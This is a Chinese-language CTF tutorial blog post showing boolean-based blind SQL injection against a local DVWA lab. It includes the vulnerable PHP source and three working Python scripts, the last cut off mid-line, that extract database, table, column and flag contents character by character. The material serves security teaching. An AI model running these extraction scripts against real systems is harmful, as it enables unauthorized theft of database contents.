<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>以dvwa为例学习简单sql布尔盲注的详细脚本 | Lethe | 忘川</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="author" content="Lethe">
  <meta name="keywords" content="Lethe's Blog">
  <meta name="description" content="Lethe's Blog">
  <script id="hexo-configurations">
  var CONFIG = {
    root: '/',
    theme: 'lx',
    version: '1.4.5',
    localsearch:{
      "enable": false,
      "trigger": "auto",
      "top_n_per_article": 1,
      "unescape": false,
      "preload": false
      },
    path: '-'
  };
</script>

  <link rel="shortcut icon" href="/hacker.png">
  <link rel="stylesheet" href="/css/main.css">
  <script src="/js/jquery.min.js"></script>
  <script src="/js/jquery.jside.menu.js"></script>
	<script>
	$(document).ready(function(){
	$(".menu-container").jSideMenu({
	    jSidePosition: "position-right",
	    jSideSticky: true,
	    jSideSkin: "moonlit",
	     });
	}); 
	</script>
  
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Montserrat:300|Noto+Serif+SC&amp;display=swap">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/font-awesome@4/css/font-awesome.min.css">
</head>
<body>
<div class="single">
<div id="page">
<div id="lx-aside" style="background-image: url(/images/page-cover.jpg)" data-stellar-background-ratio="0.5">
  <div class="overlay">
  <div class="page-title">
    <div class="avatar"><a href="/"><img src="/images/2.jpg"></a></div>
    <span>2019-03-02</span>
    <h2>以dvwa为例学习简单sql布尔盲注的详细脚本</h2>
    <div class="tags"><i class="fa fa-tag"></i><a class="tag-link" href="/tags/CTF/">CTF</a></div>
    <div class="social-links">
<a href="https://github.com/LetheSec" target="_blank"><i class="fa fa-github fa-fw"></i></a><a href="mailto:1013579926@qq.com"><i class="fa fa-envelope fa-fw"></i></a>
</div></div>
</div>
</div>
<div id="lx-main-content">
  <div class="lx-post">
    <div class="lx-entry padding">
      <div>
        <!-- <ol class="post-toc"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#undefined"><span class="post-toc-number">1.</span> <span class="post-toc-text">0x01 前置知识</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#undefined"><span class="post-toc-number">1.0.1.</span> <span class="post-toc-text">1.SQL注入与SQL盲注</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#undefined"><span class="post-toc-number">1.0.2.</span> <span class="post-toc-text">2.SQL盲注分类</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#undefined"><span class="post-toc-number">1.0.3.</span> <span class="post-toc-text">3.SQL盲注测试流程</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#undefined"><span class="post-toc-number">1.0.4.</span> <span class="post-toc-text">4.Requests库的使用</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#undefined"><span class="post-toc-number">2.</span> <span class="post-toc-text">0x02 前置工作</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#undefined"><span class="post-toc-number">3.</span> <span class="post-toc-text">0x03 Low SQL Injection (Blind)</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#undefined"><span class="post-toc-number">3.0.1.</span> <span class="post-toc-text">1.测试分析</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#undefined"><span class="post-toc-number">3.0.2.</span> <span class="post-toc-text">2.脚本编写</span></a></li></ol></li></ol></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#undefined"><span class="post-toc-number"></span> <span class="post-toc-text">0x04 总结</span></a> -->
        <!-- <!-- 
<div id="toc">
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#undefined"><span class="toc-text">0x01 前置知识</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#undefined"><span class="toc-text">1.SQL注入与SQL盲注</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#undefined"><span class="toc-text">2.SQL盲注分类</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#undefined"><span class="toc-text">3.SQL盲注测试流程</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#undefined"><span class="toc-text">4.Requests库的使用</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#undefined"><span class="toc-text">0x02 前置工作</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#undefined"><span class="toc-text">0x03 Low SQL Injection (Blind)</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#undefined"><span class="toc-text">1.测试分析</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#undefined"><span class="toc-text">2.脚本编写</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#undefined"><span class="toc-text">0x04 总结</span></a>
</div>
 --> -->
        <h2><span id="0x01-前置知识">0x01 前置知识</span></h2><p><br></p>
<h4><span id="1sql注入与sql盲注">1.SQL注入与SQL盲注</span></h4><p><strong>SQL注入：</strong></p>
<ul>
<li>执行SQL注入攻击时，服务器会响应来自数据库服务器的错误信息，信息提示SQL语法不正确等</li>
<li>一般在页面上直接就会显示执行sql语句的结果</li>
</ul>
<p><strong>SQL盲注：</strong></p>
<ul>
<li>一般情况，执行SQL盲注，服务器不会直接返回具体的数据库错误or语法错误，而是会返回程序开发所设置的特定信息（也有特例，如基于报错的盲注）</li>
<li>一般在页面上不会直接显示sql执行的结果</li>
<li>有可能出现不确定sql是否执行的情况</li>
</ul>
<p><br></p>
<h4><span id="2sql盲注分类">2.SQL盲注分类</span></h4><p>根据页面不同的响应方式，SQL盲注分为：<strong>基于布尔的盲注、基于时间的盲注、基于报错的盲注</strong></p>
<p>（1）对于<strong>基于布尔的盲注</strong>，可通过构造真or假判断条件（数据库各项信息取值的大小比较，如：字段长度、版本数值、字段名、字段名各组成部分在不同位置对应的字符ASCII码…），将构造的sql语句提交到服务器，然后根据服务器对不同的请求返回不同的页面结果（True、False）；然后不断调整判断条件中的数值以逼近真实值，特别是需要关注响应从True<-->False发生变化的转折点。<br>（2）对于<strong>基于时间的盲注</strong>，通过构造真or假判断条件的sql语句，且sql语句中根据需要联合使用sleep()函数一同向服务器发送请求，观察服务器响应结果是否会执行所设置时间的延迟响应，以此来判断所构造条件的真or假（若执行sleep延迟，则表示当前设置的判断条件为真）；然后不断调整判断条件中的数值以逼近真实值，最终确定具体的数值大小or名称拼写。<br>（3）对于<strong>基于报错的盲注</strong>，搜寻查看网上部分Blog，基本是在rand()函数作为group by的字段进行联用的时候会违反Mysql的约定而报错。rand()随机不确定性，使得group by会使用多次而报错。</--></p>
<p><br></p>
<h4><span id="3sql盲注测试流程">3.SQL盲注测试流程</span></h4><p>SQL盲注的测试过程与DVWA的普通SQL Injection操作流程类似，大致测试流程如下：</p>
<ul>
<li>判断是否存在注入，注入的类型</li>
<li>猜解当前数据库名称</li>
<li>猜解数据库中的表名</li>
<li>猜解表中的字段名</li>
<li>获取表中的字段值</li>
<li>获取数据库的其他信息：版本、用户…</li>
</ul>
<p><br></p>
<h4><span id="4requests库的使用">4.Requests库的使用</span></h4><p>在CTF中里，python脚本中最基本的就是requests库的使用，本文不过多介绍其使用方法，可参考以下官方文档，讲的很详细：<a href="http://docs.python-requests.org/zh_CN/latest/user/quickstart.html" target="_blank" rel="noopener">快速上手——requests</a>以及<a href="http://docs.python-requests.org/zh_CN/latest/user/advanced.html#advanced" target="_blank" rel="noopener">高级用法——request</a></p>
<p><br></p>
<h2><span id="0x02-前置工作">0x02 前置工作</span></h2><p><br></p>
<p>1.为了更贴近CTF比赛的模式，因此在dvwa的数据库中加入了flag，最终脚本的结果也是爆出flag<br>2.加了两个flag是为了更好体现脚本的功能<br><img src="/2019/03/02/以dvwa为例学习简单sql布尔盲注的详细脚本/20190302141221969.png" alt="dvwa库中的表"><br><img src="/2019/03/02/以dvwa为例学习简单sql布尔盲注的详细脚本/20190302141308470.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p><br></p>
<h2><span id="0x03-low-sql-injection-blind">0x03 Low SQL Injection (Blind)</span></h2><p><br></p>
<h4><span id="1测试分析">1.测试分析</span></h4><p>经过简单的测试之后发现，页面只会出现两种回显，即</p>
<pre><code>User ID exists in the database.
</code></pre><p>   和</p>
<pre><code>User ID is MISSING from the database.
</code></pre><table>
<thead>
<tr>
<th>构造User ID取值的语句</th>
<th>回显结果</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>exists</td>
</tr>
<tr>
<td>‘</td>
<td>MISSING</td>
</tr>
<tr>
<td>1 and 1=1 #</td>
<td>exists</td>
</tr>
<tr>
<td>1 and 1=2 #</td>
<td>exists</td>
</tr>
<tr>
<td>1’ and 1=1 #</td>
<td>exists</td>
</tr>
<tr>
<td>1’ and 1=2 #</td>
<td>MISSING</td>
</tr>
</tbody>
</table>
<ul>
<li>满足查询条件则返回”User ID exists in the database.”，不满足查询条件则返回”User ID is MISSING from the database.”</li>
<li>两者返回的内容随所构造的真假条件而不同，说明存在SQL盲注</li>
<li>由最后两行构造真假条件返回对应不同的结果，可知存在字符型的SQL盲注。</li>
</ul>
<p>因为本文主要目的为脚本的编写，因此查看源码：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( $_GET[ <span class="string">'Submit'</span> ] ) ) &#123; </span><br><span class="line">    <span class="comment">// Get input </span></span><br><span class="line">    $id = $_GET[ <span class="string">'id'</span> ]; </span><br><span class="line"></span><br><span class="line">    <span class="comment">// Check database </span></span><br><span class="line">    $getid  = <span class="string">"SELECT first_name, last_name FROM users WHERE user_id = '$id';"</span>; </span><br><span class="line">    $result = mysqli_query($GLOBALS[<span class="string">"___mysqli_ston"</span>],  $getid ); <span class="comment">// Removed 'or die' to suppress mysql errors </span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// Get results </span></span><br><span class="line">    $num = @mysqli_num_rows( $result ); <span class="comment">// The '@' character suppresses errors </span></span><br><span class="line">    <span class="keyword">if</span>( $num &gt; <span class="number">0</span> ) &#123; </span><br><span class="line">        <span class="comment">// Feedback for end user </span></span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'&lt;pre&gt;User ID exists in the database.&lt;/pre&gt;'</span>; </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">else</span> &#123; </span><br><span class="line">        <span class="comment">// User wasn't found, so the page wasn't! </span></span><br><span class="line">        header( $_SERVER[ <span class="string">'SERVER_PROTOCOL'</span> ] . <span class="string">' 404 Not Found'</span> ); </span><br><span class="line"></span><br><span class="line">        <span class="comment">// Feedback for end user </span></span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'&lt;pre&gt;User ID is MISSING from the database.&lt;/pre&gt;'</span>; </span><br><span class="line">    &#125; </span><br><span class="line"></span><br><span class="line">    ((is_null($___mysqli_res = mysqli_close($GLOBALS[<span class="string">"___mysqli_ston"</span>]))) ? <span class="keyword">false</span> : $___mysqli_res); </span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<ul>
<li>文本框输入并提交的形式，GET请求方式</li>
<li>未作任何输入过滤和限制，攻击者可任意构造所想输入的sql查询</li>
</ul>
<p><br></p>
<h4><span id="2脚本编写">2.脚本编写</span></h4><p>脚本中所用到的SQL语句与dvwa前面非盲注时语句差不多，可参考：<a href="https://blog.csdn.net/qq_42181428/article/details/87892132" target="_blank" rel="noopener">dvwa之SQL注入（1）</a></p>
<p><strong>（1）脚本一：爆库名、表个数、表名</strong><br>我这里写的脚本是将当前数据库的所有表名都跑出来，实际在CTF比赛中，为节约时间可以不必这么做，因为一般包含flag的表名都会有特殊含义，只需要知道包含flag的表名即可。<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="comment"># 脚本里用到的参数</span></span><br><span class="line"><span class="comment"># databaseLen   库名长度</span></span><br><span class="line"><span class="comment"># databse_name  库名</span></span><br><span class="line"><span class="comment"># tableNum      表的数量</span></span><br><span class="line"><span class="comment"># tableLen      表名长度</span></span><br><span class="line"><span class="comment"># table_name    表名</span></span><br><span class="line"></span><br><span class="line">s = requests.Session()</span><br><span class="line"></span><br><span class="line">url = <span class="string">'http://localhost:8081/dvwa/vulnerabilities/sqli_blind/'</span></span><br><span class="line"></span><br><span class="line">payloads = <span class="string">'abcdefghijklmnopqrstuvwxyz1234567890'</span> </span><br><span class="line"><span class="comment"># 这里为节约时间只包含小写字母与数字，实际可能还有大写字母与符号</span></span><br><span class="line"></span><br><span class="line">headers = &#123;<span class="string">'Cookie'</span>: <span class="string">'security=low; PHPSESSID=cv0csro3c3kk4o03dia88nopc0'</span>&#125;</span><br><span class="line"><span class="comment"># 因为dvwa需要登陆，所以要在头部里加入cookie</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1.先爆破库名的长度，以提高后续循环的效率,也可以不爆破长度，直接爆破名称（只要循环数大于长度）</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">50</span>):</span><br><span class="line">    databaseLen_payload = <span class="string">'?id=1\' and length(database())='</span>+str(j)+<span class="string">' %23&amp;Submit=Submit#'</span></span><br><span class="line">    <span class="comment"># 所有payload里的注释#要用url编码表示，因为这是直接添加在url里的</span></span><br><span class="line">    <span class="keyword">if</span> <span class="string">'User ID exists in the database.'</span> <span class="keyword">in</span> s.get(url+databaseLen_payload, headers=headers).text:</span><br><span class="line">        databaseLen = j</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">print(<span class="string">'database_lenth: '</span>+str(databaseLen))</span><br><span class="line"></span><br><span class="line"><span class="comment"># 2.爆库名</span></span><br><span class="line">databse_name = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">1</span>,databaseLen+<span class="number">1</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> payloads:</span><br><span class="line">        databse_payload = <span class="string">'?id=1\' and substr(database(),'</span>+str(j)+<span class="string">',1)=\''</span>+str(i)+<span class="string">'\' %23&amp;Submit=Submit#'</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> <span class="string">'User ID exists in the database.'</span> <span class="keyword">in</span> s.get(url+databse_payload, headers=headers).text:</span><br><span class="line">            databse_name += i</span><br><span class="line">print(<span class="string">'database_name: '</span>+databse_name)</span><br><span class="line">        </span><br><span class="line"><span class="comment"># 3.爆破表的个数</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">50</span>):</span><br><span class="line">    tableNum_payload = <span class="string">'?id=1\' and (select count(table_name) from information_schema.tables where table_schema=database())='</span>+str(j)+<span class="string">' %23&amp;Submit=Submit#'</span></span><br><span class="line">    <span class="keyword">if</span> <span class="string">'User ID exists in the database.'</span> <span class="keyword">in</span> s.get(url+tableNum_payload, headers=headers).text:</span><br><span class="line">        tableNum = j</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">print(<span class="string">'tableNum: '</span>+str(tableNum))</span><br><span class="line"></span><br><span class="line"><span class="comment"># 4.爆出所有的表名</span></span><br><span class="line"><span class="comment"># (1)爆出各个表名的长度</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">0</span>,tableNum):</span><br><span class="line">    table_name = <span class="string">''</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">50</span>):</span><br><span class="line">        tableLen_payload = <span class="string">'?id=1\' and length(substr((select table_name from information_schema.tables where table_schema=database() limit '</span>+str(j)+<span class="string">',1),1))='</span>+str(i)+<span class="string">' %23&amp;Submit=Submit#'</span></span><br><span class="line">                <span class="comment"># 用法substr('This is a test', 6) 返回'is a test'</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">'User ID exists in the database.'</span> <span class="keyword">in</span> s.get(url+tableLen_payload, headers=headers).text:</span><br><span class="line">            tableLen = i</span><br><span class="line">            print(<span class="string">'table'</span>+str(j+<span class="number">1</span>)+<span class="string">'_length: '</span>+str(tableLen))</span><br><span class="line">          </span><br><span class="line">            <span class="comment"># (2)内部循环爆破每个表的表名</span></span><br><span class="line">            <span class="keyword">for</span> m <span class="keyword">in</span> range(<span class="number">1</span>,tableLen+<span class="number">1</span>):</span><br><span class="line">                <span class="keyword">for</span> n <span class="keyword">in</span> payloads: <span class="comment"># i在上个循环用过了</span></span><br><span class="line">                    table_payload = <span class="string">'?id=1\' and substr((select table_name from information_schema.tables where table_schema=database() limit '</span>+str(j)+<span class="string">',1),'</span>+str(m)+<span class="string">',1)=\''</span>+str(n)+<span class="string">'\' %23&amp;Submit=Submit#'</span></span><br><span class="line">                    <span class="keyword">if</span> <span class="string">'User ID exists in the database.'</span> <span class="keyword">in</span> s.get(url+table_payload, headers=headers).text:</span><br><span class="line">                        table_name += n</span><br><span class="line">            print(<span class="string">'table'</span>+str(j+<span class="number">1</span>)+<span class="string">'_name: '</span>+table_name)</span><br></pre></td></tr></table></figure></p>
<p><strong>脚本一的运行结果如下：</strong><br><img src="/2019/03/02/以dvwa为例学习简单sql布尔盲注的详细脚本/20190302171115839.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" alt="script1"></p>
<p><strong>（2）脚本二：爆列名</strong><br>由脚本一得到的结果，很显然flag应该在‘flagishere’表中，因此脚本二只是针对此表来跑出其中所有的列名。<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="comment"># 根据上个脚本得到的结果，此脚本用来跑出'flagishere'表中的字段</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">s = requests.Session()  <span class="comment"># 保持回话</span></span><br><span class="line"></span><br><span class="line">url = <span class="string">'http://localhost:8081/dvwa/vulnerabilities/sqli_blind/'</span></span><br><span class="line"></span><br><span class="line">payloads = <span class="string">'abcdefghijklmnopqrstuvwxyz1234567890'</span></span><br><span class="line"></span><br><span class="line">headers = &#123;<span class="string">'Cookie'</span>: <span class="string">'security=low; PHPSESSID=cv0csro3c3kk4o03dia88nopc0'</span>&#125;</span><br><span class="line"><span class="comment"># 因为dvwa需要登陆，所以要在头部里加入cookie</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1.判断flgishere表中字段数目</span></span><br><span class="line">columnNum = <span class="number">0</span> </span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">50</span>):</span><br><span class="line">    columnNum_payload = <span class="string">'?id=1\' and (select count(column_name) from information_schema.columns where table_name=\'flagishere\')='</span>+str(j)+<span class="string">' %23&amp;Submit=Submit#'</span></span><br><span class="line">    <span class="keyword">if</span> <span class="string">'User ID exists in the database.'</span> <span class="keyword">in</span> s.get(url+columnNum_payload, headers=headers).text:</span><br><span class="line">        columnNum = j</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">print(<span class="string">'columnNum: '</span>+str(columnNum))</span><br><span class="line"></span><br><span class="line"><span class="comment"># 2.爆出每个字段名的长度</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">0</span>,columnNum):</span><br><span class="line">    column_name = <span class="string">''</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">50</span>):</span><br><span class="line">        columnLen_payload = <span class="string">'?id=1\' and length(substr((select column_name from information_schema.columns where table_name=\'flagishere\' limit '</span>+str(j)+<span class="string">',1),1))='</span>+str(i)+<span class="string">' %23&amp;Submit=Submit#'</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">'User ID exists in the database.'</span> <span class="keyword">in</span> s.get(url+columnLen_payload, headers=headers).text:</span><br><span class="line">            columnLen = i</span><br><span class="line">            print(<span class="string">'column'</span>+str(j+<span class="number">1</span>)+<span class="string">'_length: '</span>+str(columnLen))</span><br><span class="line">          </span><br><span class="line">            <span class="comment"># (2)内部循环爆破每个表的表名</span></span><br><span class="line">            <span class="keyword">for</span> m <span class="keyword">in</span> range(<span class="number">1</span>,columnLen+<span class="number">1</span>):</span><br><span class="line">                <span class="keyword">for</span> n <span class="keyword">in</span> payloads: <span class="comment"># i在上个循环用过了</span></span><br><span class="line">                    column_payload = <span class="string">'?id=1\' and substr((select column_name from information_schema.columns where table_name=\'flagishere\' limit '</span>+str(j)+<span class="string">',1),'</span>+str(m)+<span class="string">',1)=\''</span>+str(n)+<span class="string">'\' %23&amp;Submit=Submit#'</span></span><br><span class="line">                    <span class="keyword">if</span> <span class="string">'User ID exists in the database.'</span> <span class="keyword">in</span> s.get(url+column_payload, headers=headers).text:</span><br><span class="line">                        column_name += n</span><br><span class="line">            print(<span class="string">'column'</span>+str(j+<span class="number">1</span>)+<span class="string">'_name: '</span>+column_name)</span><br></pre></td></tr></table></figure></p>
<p><strong>脚本二运行结果如下：</strong><br><img src="/2019/03/02/以dvwa为例学习简单sql布尔盲注的详细脚本/20190302171725965.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" alt="script2"></p>
<p><strong>（3）脚本三：爆字段内容</strong><br>由脚本二的结果得知，真正的flag应该在’flagishere’表中的’flag’列下，所有脚本三就跑出该列下每条记录的值，也就是最终的flag(这里为了展示脚本可以爆多条记录的功能，所以自己设置了两个flag)<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 根据上个脚本得到的结果，此脚本用来跑出'flagishere'表中的字段名为'flag'</span></span><br><span class="line"><span class="comment"># 所以此脚本用来爆破flag字段中的内容</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">s = requests.Session()  <span class="comment"># 保持回话</span></span><br><span class="line"></span><br><span class="line">url = <span class="string">'http://localhost:8081/dvwa/vulnerabilities/sqli_blind/'</span></span><br><span class="line"></span><br><span class="line">payloads = <span class="string">'abcdefghijklmnopqrstuvwxyz1234567890\&#123;\&#125;'</span></span><br><span class="line"></span><br><span class="line">headers = &#123;<span class="string">'Cookie'</span>: <span class="string">'security=low; PHPSESSID=cv0csro3c3kk4o03dia88nopc0'</span>&#125;</span><br><span class="line"><span class="comment"># 因为dvwa需要登陆，所以要在头部里加入cookie</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 判断flag字段中记录(行)数量</span></span><br><span class="line">rowNum = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">50</span>):</span><br><span class="line">    rowNum_payload = <span class="string">'?id=1\' and (select count(*) from flagishere)='</span>+str(j)+<span class="string">' %23&amp;Submit=Submit#'</span></span><br><span class="line">    <span class="keyword">if</span> <span class="string">'User ID exists in the database.'</span> <span class="keyword">in</span> s.get(url+rowNum_payload, headers=headers).text:</span><br><span class="line">        rowNum = j</span><br><span class="line">print(<span class="string">"row_number: "</span>+str(rowNum))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 先爆每个字段值长度，以便控制循环，提高效率，也可省略此步骤，但要保证循环大于字段长度</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">0</span>,rowNum+<span class="number">1</span>):</span><br><span class="line"></span><br><span class="line">    rowContent = <span class="string">''</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">50</span>):</span><br><span class="line">       <span class="comment">#rowLen_payload = '?id=1\' and length(substr(select flag from flagishere limit '+str(j)+',1),1)='+str(i)+' %23&amp;Submit=Submit#'</span></span><br><span class="line">        rowLen_payload = <span class="string">'?id=1\' and length(substr((select flag from flagishere limit '</span>+str(j)+<span class="string">',1),1))='</span>+str(i)+<span class="string">' %23&amp;Submit=Submit#'</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">'User ID exists in the database.'</span> <span class="keyword">in</span> s.get(url+rowLen_payload, headers=headers).text:    </span><br><span class="line">            rowLen = i</span><br><span class="line">            print(<span class="string">'row'</span>+str(j+<span class="number">1</span>)+<span class="string">'_length: '</span>+str(rowLen))</span><br><span class="line">            <span class="comment">#爆出个字段内容</span></span><br><span class="line">            <span class="keyword">for</span> m <span class="keyword">in</span> range(<span class="number">1</span>,rowLen+<span class="number">1</span>):</span><br><span class="line">                <span class="keyword">for</span> n <span class="keyword">in</span> payloads:</span><br><span class="line">                    rowContent_payload = <span class="string">'?id=1\' and substr((select flag from flagishere limit '</span>+str(j)+<span 